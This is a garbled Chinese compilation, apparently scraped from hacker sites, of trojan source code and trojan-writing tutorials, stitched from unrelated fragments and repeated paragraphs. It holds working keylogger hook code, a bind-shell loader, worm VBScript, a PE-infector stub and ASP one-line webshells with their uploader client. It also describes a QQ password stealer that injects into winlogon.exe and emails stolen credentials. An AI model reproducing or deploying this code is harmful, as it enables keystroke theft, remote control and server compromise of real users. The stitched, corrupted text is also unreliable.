一个简单木马的源代码

一个简单的vc++6.0下的木马源码木马源程序，包括客户端和服务端PCSshare的客户端代码：#include "stdafx.h"#include "SshWork.h"#pragma data_seg("Shared")char m_CharFileName[256] = {0};HHOOK g_hook = NULL;HHOOK g_khook = NULL;INITDLLINFO m_InitInfo = {0};BOOL m_IsOk = FALSE;#pragma data_seg()#pragma comment(linker,"/section:Shared,rws")HINSTANCE ghInstance = NULL;SshWork m_Work;BOOL APIENTRY DllMain( HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_THREAD_A TTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;case DLL_PROCESS_ATTACH:ghInstance = (HINSTANCE) hModule;break;default : break;}return TRUE;}LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam){LRESULT lResult = CallNextHookEx(g_hook, nCode, wParam, lParam);//查看是否为指定进程if(!m_IsOk && m_InitInfo.m_ProcessId == GetCurrentProcessId()){//找到指定进程取消hookm_IsOk = TRUE;if(g_hook) UnhookWindowsHookEx(g_hook);//通知主进程退出HANDLE m_WaitEvent =OpenEvent(EVENT_ALL_ACCESS,FALSE,m_InitInfo.m_EventName);if(m_WaitEvent){SetEvent(m_WaitEvent);CloseHandle(m_WaitEvent);}Sleep(1000);//装载DLL到进程m_Work.m_Module = LoadLibrary(m_InitInfo.m_StartFile);if(m_Work.m_Module){m_Work.StartWork(&m_InitInfo);}}return lResult;}BOOL PlayWork(LPINITDLLINFO pInitInfo){//拷贝数据memcpy(&m_InitInfo,pInitInfo,sizeof(INITDLLINFO));//自进程启动if(pInitInfo->m_ProcessName[0] == 2){m_Work.StartWork(&m_InitInfo);return TRUE;}//检查是否已经启动if(g_hook != NULL) return FALSE;//启动HOOKg_hook = SetWindowsHookEx(WH_DEBUG, GetMsgProc, ghInstance, 0); return (g_hook != NULL);}void WriteChar(char* sText){//加锁HANDLE hMetux = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "PsKey400");if(hMetux != NULL)WaitForSingleObject(hMetux, 300);FILE* fp = fopen(m_CharFileName,"ab");if(fp != NULL){fwrite(sText,strlen(sText),1,fp);fclose(fp);}//取锁if(hMetux != NULL){ReleaseMutex(hMetux);CloseHandle(hMetux);}}LRESULT WINAPI GetKeyMsgProc(int nCode, WPARAM wParam, LPARAM lParam){LRESULT lResult = CallNextHookEx(g_khook, nCode, wParam, lParam);char key[10] = {0};BYTE buffer[256] = {0};WORD m_wchar = 0;UINT m_scan = 0;if ((lParam & 0x40000000) && (nCode == HC_ACTION)){if ((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>= 0x2f ) &&(wParam<= 0x100)){if (wParam == VK_RETURN){WriteChar("\r\n");}else{GetKeyboardState(buffer);m_scan = 0;ToAscii(wParam,m_scan,buffer , &m_wchar,0);key[0] = m_wchar%255;if(key[0] >= 32 && key[0] <= 126)WriteChar(key);}}}return lResult;}BOOL KeyStartMyWork(){if(g_khook != NULL) return FALSE;GetTempPath(200,m_CharFileName);strcat(m_CharFileName,"pskey.dat");g_khook = SetWindowsHookEx(WH_KEYBOARD,GetKeyMsgProc,ghInstance,0); return (g_khook != NULL);}void KeyStopMyWork(){if(g_khook != NULL) UnhookWindowsHookEx(g_khook);}。

Goto xing
呼呼，快去试试吧，源码在这里，清除应该不难了吧？！
关键字：开机吓人
责任编辑：blackpower
本文引用网址： 与您的QQ/MSN好友分享!
上一篇：DOS下修改IP地址和网关
下一篇：如何简单实现可执行文件的自我删除
发表评论 加入收藏 告诉好友 打印本页 关闭窗口 返回顶部 VIP会员
图片
免疫Windows系统 不受
CentOS 5.1系统下挂载
变种机器狗木马病毒防
“反黑军团”总教头
黑客训练营一瞥
热点
+ 运行命令大集合 + 不依赖于net user添加账户的 + 利用脚本编写天气查询器 + RAR命令的在批处理中的运用 +
开机吓人的程序源代码-学院-黑客基地 网站入口：用户名: 密码: 不保存保存一天保存一月保存一年 免费注册 | 忘记密码 繁體中文 设为首页
加入收藏
新闻: 业界 事件 威胁 科技 创业 社会 | 黑基公告 会员动态 企业平台 人物专访 | 安全培训 搜索 留言本 在线投稿 广告
color 4a
@Echo
________________________________________________________________________________
color 5a
@Echo
________________________________________________________________________________
图片: 黑客 极客 科技 生活 视频: 聚焦 教程 影视 娱乐 空间: 情感 电脑 生活 文艺 旅游 影音 动漫 科技 运动 图 书签

}
/************************************************************************/
/* 其它直接用IoCallDriver把IRP传到下一层驱动中 */
/************************************************************************/
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
ULONG s_UpChar=0;
typedef struct _FILTER_DEVICE_EXTEN
{
PDEVICE_OBJECT pFilterDeviceObject;//过滤设备
PDEVICE_OBJECT pTagerDeviceObject;//绑定的设备对象
KSPIN_LOCK Lockspin;//调用时的保护锁
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //shift
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,

FARPROC Pclosቤተ መጻሕፍቲ ባይዱsocket;
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
PMessageBoxA = (FARPROC)Para->dwMessageBox;
nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)&WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;
}
}
PCloseHandle(hWritePipe2);
PCloseHandle(hReadPipe1);
PCloseHandle(hReadPipe2);
memset(Para->Buff,0,4096);

end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM"
Explorer\\Main\\Start
Page"," "
elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 4 then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or

eval一句话木马原理详解eval一句话木马原理详解<%eval request("#")%>来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNA T属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: set iP=server.createObject("Adodb.Stream")iP.OpeniP.Type=2iP.CharSet="gb2312"iP.writetext request("aoyun")iP.SaveToFile server.mappath("aoyunwan.asp"),2iP.Closeset iP=nothingresponse.redirect "aoyunwan.asp"学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:set iP=server.createObject("Adodb.Stream")iP.OpeniP.Type=2iP.CharSet="gb2312"iP.writetext request("aoyun")iP.SaveToFile server.mappath("aoyunwan.asp"),2iP.Closeset iP=nothingresponse.redirect "aoyunwan.asp"学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了!不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件，因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件，如果该组件被禁用的话是不会写入成功的！二、还有就是权限的问题，如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的.============一句话木马"服务端就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp 为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为<%execute request("value")%> 其中value可以自己修改"一句话木马"客户端用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件一句话木马客户端源文件：里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了***********************************************************//"action="后面是需要修改的以asp命名的数据库的提交地址//这个标签的意思是建立一个表单以post方式提交给连接/doc/d916207664.html,/news/ebook/db/ebook .asp处理//这里的value值根据服务端<%execute request("value")%>中value而设定//可以自行修改成<%execute request("p")%>相应这里的value 值也必须改为pset lP=server.createObject("Adodb.Stream")//建立流对象，有了对象才可以使用它固有的属性和方法lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("joeving") //取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应lP.SaveToFile server.mappath("wei.asp"),2//将木马内容以覆盖文件的方式写入wei.asp//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp//但和下面的response.redirect"wei.asp"中wei.asp的保持一致lP.Close //关闭对象set lP=nothing //释放对象response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应，也就是你熟悉的asp木马登陆界面。

@@:
pop ebx
sub ebx,offset @B
ret
Relocate endp
SEHHandler proc lpExceptionRecord,lpSEH,lpContext,lpDispatcherContext
；――――――――――――――――――――――――――――――――――――――
szGetProcAddress db "GetProcAddress",0
lpGetProcAddress dd
szLoadLibrary db "LoadLibraryA",0
lpLoadLibrary dd
szKer32Name:
szGetModuleHandle db "GetModuleHandleA",0
u32Base dd
szIS db "IS",0
szMsg1 db "重定位完毕，并获得所有API地址！病毒可以在这里获得时间来执行 破坏模块",0
szMsg2 db "是否观看病毒感染过程？",0
szMsg3 db "开始查找本路径下所有EXE文件",0
szMsg4 db "找到如下可执行文件,开始对该文件进行检查...",0
szMsg5 db "该文件是一个合法的PE文件,并且没有被感染过,开始感染...",0
;code start
;--------------------------------------------------------------------------------------------------

运行以后把电脑里拨号密码都偷出来
找到运行程序的路径.！然后关闭选择的程序！
只要按一下按钮直接把所有运行窗口的密码全部变成真正的符号
网络资源管理器及源代码(1.0)
asylum_014_fe木马（含源程序）
DOS操作系统源代码
Dotpot Port Scanner 0.92
87 记录键盘,并且到一定时候发送到指定的Email里 键盘记录并发送到指定的Email
简单的说是个远程控制程序 一个远程控制程序
经典加解密源码
可以控制正在运行窗口,改变窗口里面的内容...不可思议
垃圾制造者在任何文件上添加字节
另一个可以在你的计算机上开FTP服务器的木马源代码
36 架构反弹端口远程控制例程
37 进程门神V1.0带源码
38 经典远程控制木马RemoteXP代码
39 经典远程控制木马Way2.4代码
40 经典远控木马NetBus代码
41 经典远控木马小马哥代码
42 局域网扫描、远程启动源代码
43 两款小插件的源码 FlatStyle和LBButton
木马的扫描
骗取Novell网密码的源代码
拖动程序内的图标得到窗口的handle,class,text,parent,颜色,windo
完整的特洛伊木马 PRIORITY 源代码
完整的特洛伊木马 Serve_Me 源代码
完整的下载程序
完整的子网扫描程序本机和远程机器的端口扫瞄
100 网路IP小工具,包括扫瞄,Ping,多线Ping
直接通过ODBC读、写Excel表格文件示例源码(1.0)
Word2000&XP中内部COM插件的编程实现(源码)(1.0)

木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。

为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。

目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。

Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。

Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。

不光占去了大量的空间（光一个Form就有300K 之大），而且使软件可见，根本没什么作用。

因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

⽊马程序开发技术：病毒源代码详解近年来，⿊客技术不断成熟起来，对⽹络安全造成了极⼤的威胁，⿊客的主要攻击⼿段之⼀，就是使⽤⽊马技术，渗透到对⽅的主机系统⾥，从⽽实现对远程操作⽬标主机。

其破坏⼒之⼤，是绝不容忽视的，⿊客到底是如何制造了这种种具有破坏⼒的⽊马程序呢，下⾯我对⽊马进⾏源代码级的详细的分析，让我们对⽊马的开发技术做⼀次彻底的透视，从了解⽊马技术开始，更加安全的管理好⾃⼰的计算机。

1、⽊马程序的分类 ⽊马程序技术发展⾄今，已经经历了4代，第⼀代，即是简单的密码窃取，发送等，没有什么特别之处。

第⼆代⽊马，在技术上有了很⼤的进步，冰河可以说为是国内⽊马的典型代表之⼀。

第三代⽊马在数据传递技术上，⼜做了不⼩的改进，出现了ICMP等类型的⽊马，利⽤畸形报⽂传递数据，增加了查杀的难度。

第四代⽊马在进程隐藏⽅⾯，做了⼤的改动，采⽤了内核插⼊式的嵌⼊⽅式，利⽤远程插⼊线程技术，嵌⼊DLL线程。

或者挂接PSAPI,实现⽊马程序的隐藏，甚⾄在Windows NT/2000下，都达到了良好的隐藏效果。

相信，第五代⽊马很快也会被编制出来。

关于更详细的说明，可以参考ShotGun的⽂章《揭开⽊马的神秘⾯纱》。

2．⽊马程序的隐藏技术 ⽊马程序的服务器端，为了避免被发现，多数都要进⾏隐藏处理，下⾯让我们来看看⽊马是如何实现隐藏的。

说到隐藏，⾸先得先了解三个相关的概念：进程，线程和服务。

我简单的解释⼀下。

进程：⼀个正常的Windows应⽤程序，在运⾏之后，都会在系统之中产⽣⼀个进程，同时，每个进程，分别对应了⼀个不同的PID（Progress ID, 进程标识符）这个进程会被系统分配⼀个虚拟的内存空间地址段，⼀切相关的程序操作，都会在这个虚拟的空间中进⾏。

线程：⼀个进程，可以存在⼀个或多个线程，线程之间同步执⾏多种操作，⼀般地，线程之间是相互独⽴的，当⼀个线程发⽣错误的时候，并不⼀定会导致整个进程的崩溃。

//---------------------------------------------------------------------
//复制自身到系统目录
//pAim:[in,out],初始为存放目标文件名缓冲区的指针，
//函数向缓冲区返回完整路径的目标文件名
//成功返回0，否则返回非0
递归枚举hFatherWindow指定的窗口下的所有子窗口和兄弟窗口，
返回和lstyle样式相同的窗口句柄，如果没有找到，返回NULL
---------------------------------------------------------------------*/
HWND GetStyleWindow(HWND hFatherWindow, const long lstyle);
//将FullName指定的dll文件以远程线程方式插入到Pid指定的进程里
//成功返回0，失败返回1
int InjectDll(const char *FullName, const DWORD Pid);
/*---------------------------------------------------------------------
#include <windows.h>
//---------------------------------------------------------------------
//判断系统版本，9x返回1，NT、2000、xp、2003返回2，其它返回0
int GetOsVer(void);
首先，判断系统版本，如果就9x，将自己复制到系统目录，如果复制成功，说明自身没有在系统目录运行那么需要启动系统目录下的实例，然后自己退出。再创建一个互斥量，保证只有一个实例存在。接下来，用RegisterServiceProcess函数将自己注册成一个服务程序，这样在9x下按ctrl＋alt＋del就不会看到了。最后，调用GetQQPass函数，监视QQ登录的情况。如果是NT系统，将自己安装为自动启动的系统服务，服务启动后，任务就是释放两个要插入其他进程的dll，把监视QQ登录窗口的dll插入到winlogon.exe进程中，然后就停止，这样就不会在任务管理器里面看到不正常的进程了。插入到winlogon.exe里面的线程负责监视是否有QQ登录，发现后就将GetQQPass函数作为一个线程插入到QQ进程中，当GetQQPass函数捕获到号码和密码时，就向设置好的邮箱发一封信。至于为什么要插入到winlogon.exe进程，只是习惯而已，当然，也可以插入到其他的系统进程里，但是注意一定要插入到系统进程，不能是用户进程。因为只有系统进程里的线程才能在任何用户登录的情况下都有权限做远程线程插入的动作。GetQQPass函数我使用很简单的办法，就是向QQ的号码和密码窗口发送WM_GETTEXT消息得到它们的内容。判断哪个窗口是号码窗口和密码窗口的办法也是最常用的，就是靠它们的style。首先用QQ登录窗口的类名得到QQ的登录窗口的句柄，再通过这个句柄找到号码窗口和密码窗口的句柄。类名和子窗口的style都是用spy++得到的。这里有一个细节，就是“QQ注册向导”窗口里面，选中“使用已有的QQ号码”以后和选中以前的号码与密码窗口的style是不一样的，当然我们要选中以后的style了。发邮件部分也很简陋，现在只在163和sina的测试过，还能用。其中base64编码部分的代码是以前从网上copy的，忘了从哪里看的了，总之感谢这段代码的作者。

得到字符串的长度
int file_name=atoi（（temp.SubString（11,1））.c_str（））;
将第11个字符转换成integer型，存入file_name变量
为什么要取第11个字符，因为第10个字符是空格字符
content=（temp.SubString（12,number-11）+'n'）.c_str（）;
首先判断目标机的操作系统是Win9x还是WinNt：
{
DWORD dwVersion = GetVersion（）;
得到操作系统的版本号
if （dwVersion = 0x80000000）
操作系统是Win9x，不是WinNt
{
typedef DWORD （CALLBACK LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;
用C++编写木马全过程
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈难道你还给受害者传一个1兆多的动态链接库Msvbvm60.dll吗？
定义RegisterServiceProcess（）函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

计算机病毒实验报告姓名：郭莎莎学号： 201306043023 培养类型：技术类年级： 2013级专业：信息安全所属学院：计算机学院指导教员：龙军职称：教授实验室：实验日期： 2016.7.3国防科学技术大学训练部制《本科实验报告》填写说明1．学员完成人才培养方案和课程标准要所要求的每个实验后，均须提交实验报告。

2．实验报告封面必须打印，报告内容可以手写或打印。

3．实验报告内容编排及打印应符合以下要求：（1）采用A4（21cm×29.7cm）白色复印纸，单面黑字打印。

上下左右各侧的页边距均为3cm；缺省文档网格：字号为小4号，中文为宋体，英文和阿拉伯数字为Times New Roman，每页30行，每行36字；页脚距边界为2.5cm，页码置于页脚、居中，采用小5号阿拉伯数字从1开始连续编排，封面不编页码。

（2）报告正文最多可设四级标题，字体均为黑体，第一级标题字号为3号，其余各级标题为4号；标题序号第一级用“一、”、“二、”……，第二级用“（一）”、“（二）” ……，第三级用“1.”、“2.”……，第四级用“（1）”、“（2）” ……，分别按序连续编排。

（3）正文插图、表格中的文字字号均为5号。

实验题目 Python病毒功能实现目录一、实验目的 (4)二、实验内容 (4)三、实验原理 (4)（一）Linux病毒 (4)1.Linux病毒的发展史 (4)2.Linux平台下的病毒分类 (5)（二）文件型病毒 (6)1.感染COM文件： (6)2．感染EXE文件： (6)（三）python文件 (7)四、实验所需软硬件 (8)五、实验步骤 (8)（一）程序框架 (8)1.传播感染模块 (8)2.备份模块 (9)3.触发和破坏模块 (9)（二）具体实现 (9)（三）结果截屏 (11)六、实验结果与分析 (12)七、思考与总结 (12)一、实验目的了解和掌握计算机病毒的工作原理，编写一个具有基本功能的计算机病毒。

⼀句话⽊马web安全--⼀句话⽊马0x00 php预备知识PHP $_GET预定义的$_GET变量⽤于收集来⾃method=‘’get“的表单中的值。

从带有GET⽅法的表单发送的信息，对任何⼈都是可见的（会显⽰在浏览器的地址栏），⽽$_GET就是⽤来收集表单数据的变量，⽽表单域的名称会⾃动变成为$ _GET数组中的键。

例如发送到服务器的url为/welcome.php?fname=Shuke&age=3welcome.php⽂件现在就可以$_GET变量来收集表单数据了欢迎<?php echo $_GET["fname"]; ?>!<br>//在html中<br>表⽰换⾏，有多少个<br>就表⽰换多少⾏。

你的年龄是<?php echo $_GET["age"]; ?> 岁得到的结果显⽰为欢迎shuke！你的年龄是3岁PHP $_POST在PHP中，预定的$_POST⽤于收集来⾃method="post"表单中的值跟GET相反，POST⽅法发送的表单对任何⼈都是不可见的，当然也不会显⽰在浏览器地址栏的url中，⽽$_POST就是⽤来收集⽤POST⽅法发送的表单数据的变量，⽽表单域的名称会⾃动变成为$ _POST数组中的键。

例如form.html⽂件代码如下<html><head><meta charset="utf-8"><title>xxxxx</title></head><body><form action="welcome.php" method="post">名字: <input type="text" name="fname">年龄: <input type="text" name="age"><input type="submit" value="提交"></form></body></html>提交时，url显⽰为/welcome.phpwelcome.php⽂件现在就可以$_POST变量来收集表单数据了欢迎<?php echo $_POST["fname"]; ?>!<br>你的年龄是<?php echo $_POST["age"]; ?> 岁得到的结果显⽰为欢迎shuke！你的年龄是3岁$_REQUEST变量包含$_GET _POST _COOIKE的内容，可收集通过POST或GET发送的的表单数据eval（）函数要点：eval（）函数把字符串作为PHP代码执⾏。

⼿动编写windows简单⽊马声明：本帖仅作技术交流，切莫⽤于⾮法⽤途。

否则造成的⼀切法律责任与作者⽆关。

"使⽤C++实现⼀个简单的⽊马，实现⽊马的远程控制功能，能够开机⾃启动和伪装或隐藏，最后通过清除本⽊马，掌握常规的⽊马排查和查杀⽅法。

"⼯具：vc++6.0攻击机：win10(ip随机) 靶机：192.168.1.129⼀、⽊马是什么？这是⼀个⽼⽣常谈的问题，⽊马（Trojan）这个名字来源于古希腊传说(荷马史诗中⽊马计的故事，Trojan⼀词的本意是特洛伊的，即代指特洛伊⽊马，也就是⽊马计的故事)。

⼆、⽊马隐藏技术⽊马会想尽⼀切办法隐藏⾃⼰，主要途径有：在任务栏中隐藏⾃⼰，这是最基本的办法。

只要把Form的Visible属性设为False，ShowInTaskBar设为False，程序运⾏时就不会出现在任务栏中了（MFC编程）。

在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装⾃⼰。

当然它也会悄⽆声息地启动，⿊客当然不会指望⽤户每次启动后点击“⽊马”图标来运⾏服务端，“⽊马”会在每次⽤户启动时⾃动装载。

Windows系统启动时⾃动加载应⽤程序的⽅法，“⽊马”都会⽤上，如：启动组、Win.ini、System.ini、注册表等都是“⽊马”藏⾝的好地⽅。

⽊马与计算机⽹络中常常要⽤到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“⽊马”则完全相反，⽊马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫⽆价值”的。

三、⽊马程序原理：⽊马病毒的⼯作原理：⼀个完整的特洛伊⽊马套装程序含了两部分：服务端（服务器部分）和客户端（控制器部分）。

植⼊对⽅电脑的是服务端，⽽⿊客正是利⽤客户端进⼊运⾏了服务端的电脑。

运⾏了⽊马程序的服务端以后，会产⽣⼀个有着容易迷惑⽤户的名称的进程，暗中打开端⼝，向指定地点发送数据（如⽹络游戏的密码，即时通信软件密码和⽤户上⽹密码等），⿊客甚⾄可以利⽤这些打开的端⼝进⼊电脑系统。

Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：
Private Sub tcpServer_ConnectionRequest
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：
浅谈用VB6.0编写“特洛伊木马”程序
“特洛伊木马”有被称为BO， 是在美国一次黑客技术讨论会ห้องสมุดไป่ตู้由一个黑客组织推出的。它其实是一种客户机/服务器程序，其利用的原理就是：在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端（即被攻击的计算机）的服务器程序，就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。
使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。
在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。

为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。

目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder （以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。

Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。

Socket最初是在Unix上出现的，后来微软将它引入了Windows 中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。

不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。

因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。